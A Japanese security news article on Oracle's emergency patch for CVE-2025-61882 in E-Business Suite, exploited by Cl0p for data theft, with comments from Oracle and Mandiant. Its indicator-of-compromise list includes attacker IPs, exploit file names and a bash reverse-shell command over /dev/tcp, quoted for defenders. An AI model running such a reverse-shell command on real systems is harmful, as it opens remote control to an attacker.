Cl0pがOracleの脆弱性を悪用

Dragos Asaftei / Shutterstock

Oracleは、同社のE-Business Suite（EBS）に存在する重大なセキュリティ脆弱性を修正するため、緊急アップデートを公開しました。この脆弱性（CVE-2025-61882）はCVSSスコア9.8で、Cl0pによる最近の攻撃でデータ窃取にすでに悪用されています。

この脆弱性は詳細不明のバグに起因し、HTTP経由でネットワークアクセス可能な未認証の攻撃者がOracle Concurrent-Processingコンポーネントを侵害し、制御を奪うことを可能にします。

リモートからのアクセス

「この脆弱性は認証なしでリモートから、つまりユーザー名やパスワードなしにネットワーク経由で悪用可能です」とOracleは述べています。エクスプロイトが成功すると、攻撃者はこの脆弱性を通じてリモートで悪意のあるコードを実行できるようになります。

OracleのチーフセキュリティオフィサーであるRob Duhart氏によると、企業は侵害の兆候（IoC）に注意を払うべきです。以下のIPアドレスやアーティファクトは、Scattered LAPSUS$ Huntersグループがこのエクスプロイトに関与している可能性を示しています：

• 200.107.207[.]26（GETおよびPOSTアクティビティの可能性）
• 185.181.60[.]11（GETおよびPOSTアクティビティの可能性）
• sh -c /bin/bash -i >& /dev/tcp// 0>&1（特定のポートを使った外部TCP接続の確立）
• oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
• oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
• oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

メールによる侵害

セキュリティ企業Mandiantは、これらの侵害を「数百の侵害されたアカウントから開始された大規模なメールキャンペーン」と説明しています。「Cl0pはOracle EBSの複数の脆弱性を悪用し、2025年8月に複数の被害者から大量のデータを盗み出しました」とMandiantのCTO、Charles Carmakal氏はLinkedIn投稿で述べています。

同氏はさらに、「2025年7月のOracleアップデートで修正された脆弱性や、今週末に修正された（CVE-2025-61882）など、複数の脆弱性が悪用されました」と付け加えました。

「すでに大規模なゼロデイ悪用が発生していること（および今後他の攻撃者によるNデイ悪用が予想されること）を踏まえ、企業はパッチ適用の時期に関わらず、すでに侵害されていないか確認すべきです」とCarmakal氏は述べています。